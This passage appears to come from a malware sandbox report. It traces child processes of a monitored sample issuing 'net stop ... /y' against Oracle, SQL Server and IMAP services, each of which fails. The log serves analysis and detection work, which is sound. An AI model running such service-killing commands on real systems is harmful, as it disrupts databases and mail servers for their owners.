_String2="OracleClientCache80") returned -2 [0212.896] _wcsicmp (_String1="receiver", _String2="OracleClientCache80") returned 3 [0212.896] _wcsicmp (_String1="rcv", _String2="OracleClientCache80") returned 3 [0212.896] _wcsicmp (_String1="netpopup", _String2="OracleClientCache80") returned -1 [0212.896] _wcsicmp (_String1="redirector", _String2="OracleClientCache80") returned 3 [0212.896] _wcsicmp (_String1="redir", _String2="OracleClientCache80") returned 3 [0212.896] _wcsicmp (_String1="rdr", _String2="OracleClientCache80") returned 3 [0212.896] _wcsicmp (_String1="workstation", _String2="OracleClientCache80") returned 8 [0212.896] _wcsicmp (_String1="work", _String2="OracleClientCache80") returned 8 [0212.896] _wcsicmp (_String1="wksta", _String2="OracleClientCache80") returned 8 [0212.897] _wcsicmp (_String1="prdr", _String2="OracleClientCache80") returned 1 [0212.897] _wcsicmp (_String1="devrdr", _String2="OracleClientCache80") returned -11 [0212.897] _wcsicmp (_String1="lanmanworkstation", _String2="OracleClientCache80") returned -3 [0212.897] _wcsicmp (_String1="server", _String2="OracleClientCache80") returned 4 [0212.897] _wcsicmp (_String1="svr", _String2="OracleClientCache80") returned 4 [0212.897] _wcsicmp (_String1="srv", _String2="OracleClientCache80") returned 4 [0212.897] _wcsicmp (_String1="lanmanserver", _String2="OracleClientCache80") returned -3 [0212.897] _wcsicmp (_String1="alerter", _String2="OracleClientCache80") returned -14 [0212.897] _wcsicmp (_String1="netlogon", _String2="OracleClientCache80") returned -1 [0212.897] _wcsupr (in: _String="OracleClientCache80" | out: _String="ORACLECLIENTCACHE80") returned="ORACLECLIENTCACHE80" [0212.897] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3d54f0 [0212.900] GetServiceKeyNameW (in: hSCManager=0x3d54f0, lpDisplayName="ORACLECLIENTCACHE80", lpServiceName=0xc2aaf0, lpcchBuffer=0x34f704 | out: lpServiceName="", lpcchBuffer=0x34f704) returned 0 [0212.900] _wcsicmp (_String1="msg", _String2="ORACLECLIENTCACHE80") returned -2 [0212.900] _wcsicmp (_String1="messenger", _String2="ORACLECLIENTCACHE80") returned -2 [0212.900] _wcsicmp (_String1="receiver", _String2="ORACLECLIENTCACHE80") returned 3 [0212.900] _wcsicmp (_String1="rcv", _String2="ORACLECLIENTCACHE80") returned 3 [0212.900] _wcsicmp (_String1="redirector", _String2="ORACLECLIENTCACHE80") returned 3 [0212.900] _wcsicmp (_String1="redir", _String2="ORACLECLIENTCACHE80") returned 3 [0212.900] _wcsicmp (_String1="rdr", _String2="ORACLECLIENTCACHE80") returned 3 [0212.900] _wcsicmp (_String1="workstation", _String2="ORACLECLIENTCACHE80") returned 8 [0212.900] _wcsicmp (_String1="work", _String2="ORACLECLIENTCACHE80") returned 8 [0212.900] _wcsicmp (_String1="wksta", _String2="ORACLECLIENTCACHE80") returned 8 [0212.900] _wcsicmp (_String1="prdr", _String2="ORACLECLIENTCACHE80") returned 1 [0212.900] _wcsicmp (_String1="devrdr", _String2="ORACLECLIENTCACHE80") returned -11 [0212.900] _wcsicmp (_String1="lanmanworkstation", _String2="ORACLECLIENTCACHE80") returned -3 [0212.900] _wcsicmp (_String1="server", _String2="ORACLECLIENTCACHE80") returned 4 [0212.900] _wcsicmp (_String1="svr", _String2="ORACLECLIENTCACHE80") returned 4 [0212.900] _wcsicmp (_String1="srv", _String2="ORACLECLIENTCACHE80") returned 4 [0212.900] _wcsicmp (_String1="lanmanserver", _String2="ORACLECLIENTCACHE80") returned -3 [0212.900] _wcsicmp (_String1="alerter", _String2="ORACLECLIENTCACHE80") returned -14 [0212.900] _wcsicmp (_String1="netlogon", _String2="ORACLECLIENTCACHE80") returned -1 [0212.901] NetServiceControl (in: servername=0x0, service="ORACLECLIENTCACHE80", opcode=0x0, arg=0x0, bufptr=0x34f700 | out: bufptr=0x34f700) returned 0x889 [0212.901] wcscpy_s (in: _Destination=0xc2a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0212.901] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0212.902] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc2b338, nSize=0x800, Arguments=0xc29dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0212.903] GetFileType (hFile=0x26c) returned 0x3 [0212.903] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3d4020 [0212.903] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3d4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n<", lpUsedDefaultChar=0x0) returned 30 [0212.903] WriteFile (in: hFile=0x26c, lpBuffer=0x3d4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x34f640, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x34f640, lpOverlapped=0x0) returned 0 [0212.903] LocalFree (hMem=0x3d4020) returned 0x0 [0212.903] GetFileType (hFile=0x26c) returned 0x3 [0212.903] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d62c8 [0212.904] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3d62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=", lpUsedDefaultChar=0x0) returned 2 [0212.904] WriteFile (in: hFile=0x26c, lpBuffer=0x3d62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x34f640, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x34f640, lpOverlapped=0x0) returned 0 [0212.904] LocalFree (hMem=0x3d62c8) returned 0x0 [0212.904] _ultow (in: _Dest=0x889, _Radix=3470960 | out: _Dest=0x889) returned="2185" [0212.904] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc2b338, nSize=0x800, Arguments=0xc29dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0212.904] GetFileType (hFile=0x26c) returned 0x3 [0212.904] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3d62c8 [0212.904] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3d62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0212.904] WriteFile (in: hFile=0x26c, lpBuffer=0x3d62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x34f64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x34f64c, lpOverlapped=0x0) returned 0 [0212.904] LocalFree (hMem=0x3d62c8) returned 0x0 [0212.904] GetFileType (hFile=0x26c) returned 0x3 [0212.904] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d62c8 [0212.904] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3d62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=", lpUsedDefaultChar=0x0) returned 2 [0212.904] WriteFile (in: hFile=0x26c, lpBuffer=0x3d62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x34f64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x34f64c, lpOverlapped=0x0) returned 0 [0212.904] LocalFree (hMem=0x3d62c8) returned 0x0 [0212.905] NetApiBufferFree (Buffer=0x3d1c80) returned 0x0 [0212.905] NetApiBufferFree (Buffer=0x3d1c98) returned 0x0 [0212.905] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" [0212.905] exit (_Code=2) Process: id = "314" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4bed5000" os_pid = "0x110" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 487 os_tid = 0x744 Process: id = "315" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6b555000" os_pid = "0x6b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "314" os_parent_pid = "0x110" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 488 os_tid = 0x594 [0213.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36f8c8 | out: lpSystemTimeAsFileTime=0x36f8c8*(dwLowDateTime=0x482c8320, dwHighDateTime=0x1d57a87)) [0213.047] GetCurrentProcessId () returned 0x6b8 [0213.047] GetCurrentThreadId () returned 0x594 [0213.047] GetTickCount () returned 0x116ed4c [0213.047] QueryPerformanceCounter (in: lpPerformanceCount=0x36f8c0 | out: lpPerformanceCount=0x36f8c0*=33333158882) returned 1 [0213.047] GetModuleHandleA (lpModuleName=0x0) returned 0xb0000 [0213.047] __set_app_type (_Type=0x1) [0213.047] __p__fmode () returned 0x74eb31f4 [0213.047] __p__commode () returned 0x74eb31fc [0213.048] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbffe6) returned 0x0 [0213.048] __getmainargs (in: _Argc=0xc9064, _Argv=0xc906c, _Env=0xc9068, _DoWildCard=0, _StartInfo=0xc9024 | out: _Argc=0xc9064, _Argv=0xc906c, _Env=0xc9068) returned 0 [0213.048] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.048] GetConsoleOutputCP () returned 0x1b5 [0213.048] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc9080 | out: lpCPInfo=0xc9080) returned 1 [0213.048] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.051] sprintf_s (in: _DstBuf=0x36f880, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0213.052] setlocale (category=0, locale=".437") returned="English_United States.437" [0213.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0213.054] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0213.054] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PROFXENGAGEMENT /y" [0213.054] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36f64c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0213.054] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x7e) returned 0x4d3c20 [0213.054] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0213.054] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36f850 | out: Buffer=0x36f850*=0x4d1c80) returned 0x0 [0213.054] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36f850 | out: Buffer=0x36f850*=0x4d1c98) returned 0x0 [0213.054] _fileno (_File=0x74eb2900) returned -2 [0213.055] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0213.055] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0213.055] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0213.055] _wcsicmp (_String1="config", _String2="stop") returned -16 [0213.055] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0213.055] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0213.055] _wcsicmp (_String1="file", _String2="stop") returned -13 [0213.055] _wcsicmp (_String1="files", _String2="stop") returned -13 [0213.055] _wcsicmp (_String1="group", _String2="stop") returned -12 [0213.055] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0213.055] _wcsicmp (_String1="help", _String2="stop") returned -11 [0213.055] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0213.055] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0213.055] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0213.055] _wcsicmp (_String1="session", _String2="stop") returned -15 [0213.055] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0213.055] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0213.055] _wcsicmp (_String1="share", _String2="stop") returned -12 [0213.055] _wcsicmp (_String1="start", _String2="stop") returned -14 [0213.055] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0213.055] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0213.055] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0213.055] _wcsicmp (_String1="accounts", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0213.055] _wcsicmp (_String1="computer", _String2="MSSQL$PROFXENGAGEMENT") returned -10 [0213.055] _wcsicmp (_String1="config", _String2="MSSQL$PROFXENGAGEMENT") returned -10 [0213.055] _wcsicmp (_String1="continue", _String2="MSSQL$PROFXENGAGEMENT") returned -10 [0213.055] _wcsicmp (_String1="cont", _String2="MSSQL$PROFXENGAGEMENT") returned -10 [0213.055] _wcsicmp (_String1="file", _String2="MSSQL$PROFXENGAGEMENT") returned -7 [0213.055] _wcsicmp (_String1="files", _String2="MSSQL$PROFXENGAGEMENT") returned -7 [0213.055] _wcsicmp (_String1="group", _String2="MSSQL$PROFXENGAGEMENT") returned -6 [0213.055] _wcsicmp (_String1="groups", _String2="MSSQL$PROFXENGAGEMENT") returned -6 [0213.055] _wcsicmp (_String1="help", _String2="MSSQL$PROFXENGAGEMENT") returned -5 [0213.055] _wcsicmp (_String1="helpmsg", _String2="MSSQL$PROFXENGAGEMENT") returned -5 [0213.055] _wcsicmp (_String1="localgroup", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0213.055] _wcsicmp (_String1="pause", _String2="MSSQL$PROFXENGAGEMENT") returned 3 [0213.056] _wcsicmp (_String1="session", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="sessions", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="sess", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="share", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="start", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="stats", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="statistics", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="stop", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="time", _String2="MSSQL$PROFXENGAGEMENT") returned 7 [0213.056] _wcsicmp (_String1="user", _String2="MSSQL$PROFXENGAGEMENT") returned 8 [0213.056] _wcsicmp (_String1="users", _String2="MSSQL$PROFXENGAGEMENT") returned 8 [0213.056] _wcsicmp (_String1="msg", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0213.056] _wcsicmp (_String1="messenger", _String2="MSSQL$PROFXENGAGEMENT") returned -14 [0213.056] _wcsicmp (_String1="receiver", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.056] _wcsicmp (_String1="rcv", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.056] _wcsicmp (_String1="netpopup", _String2="MSSQL$PROFXENGAGEMENT") returned 1 [0213.056] _wcsicmp (_String1="redirector", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.056] _wcsicmp (_String1="redir", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.056] _wcsicmp (_String1="rdr", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.056] _wcsicmp (_String1="workstation", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0213.056] _wcsicmp (_String1="work", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0213.056] _wcsicmp (_String1="wksta", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0213.056] _wcsicmp (_String1="prdr", _String2="MSSQL$PROFXENGAGEMENT") returned 3 [0213.056] _wcsicmp (_String1="devrdr", _String2="MSSQL$PROFXENGAGEMENT") returned -9 [0213.056] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0213.056] _wcsicmp (_String1="server", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="svr", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="srv", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.056] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0213.056] _wcsicmp (_String1="alerter", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0213.056] _wcsicmp (_String1="netlogon", _String2="MSSQL$PROFXENGAGEMENT") returned 1 [0213.056] _wcsupr (in: _String="MSSQL$PROFXENGAGEMENT" | out: _String="MSSQL$PROFXENGAGEMENT") returned="MSSQL$PROFXENGAGEMENT" [0213.057] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4d54f0 [0213.059] GetServiceKeyNameW (in: hSCManager=0x4d54f0, lpDisplayName="MSSQL$PROFXENGAGEMENT", lpServiceName=0xcaaf0, lpcchBuffer=0x36f7ec | out: lpServiceName="", lpcchBuffer=0x36f7ec) returned 0 [0213.060] _wcsicmp (_String1="msg", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0213.060] _wcsicmp (_String1="messenger", _String2="MSSQL$PROFXENGAGEMENT") returned -14 [0213.060] _wcsicmp (_String1="receiver", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.060] _wcsicmp (_String1="rcv", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.060] _wcsicmp (_String1="redirector", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.060] _wcsicmp (_String1="redir", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.060] _wcsicmp (_String1="rdr", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0213.060] _wcsicmp (_String1="workstation", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0213.060] _wcsicmp (_String1="work", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0213.060] _wcsicmp (_String1="wksta", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0213.060] _wcsicmp (_String1="prdr", _String2="MSSQL$PROFXENGAGEMENT") returned 3 [0213.060] _wcsicmp (_String1="devrdr", _String2="MSSQL$PROFXENGAGEMENT") returned -9 [0213.060] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0213.060] _wcsicmp (_String1="server", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.060] _wcsicmp (_String1="svr", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.060] _wcsicmp (_String1="srv", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0213.060] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0213.060] _wcsicmp (_String1="alerter", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0213.060] _wcsicmp (_String1="netlogon", _String2="MSSQL$PROFXENGAGEMENT") returned 1 [0213.060] NetServiceControl (in: servername=0x0, service="MSSQL$PROFXENGAGEMENT", opcode=0x0, arg=0x0, bufptr=0x36f7e8 | out: bufptr=0x36f7e8) returned 0x889 [0213.061] wcscpy_s (in: _Destination=0xca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0213.061] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0213.062] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xcb338, nSize=0x800, Arguments=0xc9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0213.063] GetFileType (hFile=0x26c) returned 0x3 [0213.063] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4d4020 [0213.063] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4d4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nL", lpUsedDefaultChar=0x0) returned 30 [0213.063] WriteFile (in: hFile=0x26c, lpBuffer=0x4d4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x36f728, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f728, lpOverlapped=0x0) returned 0 [0213.063] LocalFree (hMem=0x4d4020) returned 0x0 [0213.063] GetFileType (hFile=0x26c) returned 0x3 [0213.063] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4d62c8 [0213.063] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4d62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nM", lpUsedDefaultChar=0x0) returned 2 [0213.063] WriteFile (in: hFile=0x26c, lpBuffer=0x4d62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f728, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f728, lpOverlapped=0x0) returned 0 [0213.063] LocalFree (hMem=0x4d62c8) returned 0x0 [0213.063] _ultow (in: _Dest=0x889, _Radix=3602264 | out: _Dest=0x889) returned="2185" [0213.063] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xcb338, nSize=0x800, Arguments=0xc9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0213.064] GetFileType (hFile=0x26c) returned 0x3 [0213.064] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4d62c8 [0213.064] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4d62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0213.064] WriteFile (in: hFile=0x26c, lpBuffer=0x4d62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x36f734, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f734, lpOverlapped=0x0) returned 0 [0213.064] LocalFree (hMem=0x4d62c8) returned 0x0 [0213.064] GetFileType (hFile=0x26c) returned 0x3 [0213.064] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4d62c8 [0213.064] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4d62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nM", lpUsedDefaultChar=0x0) returned 2 [0213.064] WriteFile (in: hFile=0x26c, lpBuffer=0x4d62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f734, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f734, lpOverlapped=0x0) returned 0 [0213.064] LocalFree (hMem=0x4d62c8) returned 0x0 [0213.064] NetApiBufferFree (Buffer=0x4d1c80) returned 0x0 [0213.065] NetApiBufferFree (Buffer=0x4d1c98) returned 0x0 [0213.065] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PROFXENGAGEMENT /y" [0213.065] exit (_Code=2) Process: id = "316" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5e1da000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop IMAP4Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 489 os_tid = 0xa8c Process: id = "317" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x48bf3000" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "316" os_parent_pid = "0xb40" cmd_line = "C:\\Windows\\system32\\net1 stop IMAP4Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 490 os_tid = 0xa78 [0213.203] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f7b0 | out: lpSystemTimeAsFileTime=0x30f7b0*(dwLowDateTime=0x484450e0, dwHighDateTime=0x1d57a87)) [0213.203] GetCurrentProcessId () returned 0xa54 [0213.203] GetCurrentThreadId () returned 0xa78 [0213.203] GetTickCount () returned 0x116ede8 [0213.203] QueryPerformanceCounter (in: lpPerformanceCount=0x30f7a8 | out: lpPerformanceCount=0x30f7a8*=33348794473) returned 1 [0213.204] GetModuleHandleA (lpModuleName=0x0) returned 0x730000 [0213.204] __set_app_type (_Type=0x1) [0213.204] __p__fmode () returned 0x74eb31f4 [0213.204] __p__commode () returned 0x74eb31fc [0213.204] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x73ffe6) returned 0x0 [0213.204] __getmainargs (in: _Argc=0x749064, _Argv=0x74906c, _Env=0x749068, _DoWildCard=0, _StartInfo=0x749024 | out: _Argc=0x749064, _Argv=0x74906c, _Env=0x749068) returned 0 [0213.204] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.204] GetConsoleOutputCP () returned 0x1b5 [0213.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x749080 | out: lpCPInfo=0x749080) returned 1 [0213.204] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.207] sprintf_s (in: _DstBuf=0x30f768, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0213.208] setlocale (category=0, locale=".437") returned="English_United States.437" [0213.210] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0213.210] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0213.210] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop IMAP4Svc /y" [0213.210] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f534, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0213.210] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x64) returned 0x563c00 [0213.210] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0213.210] NetApiBufferAllocate (in: 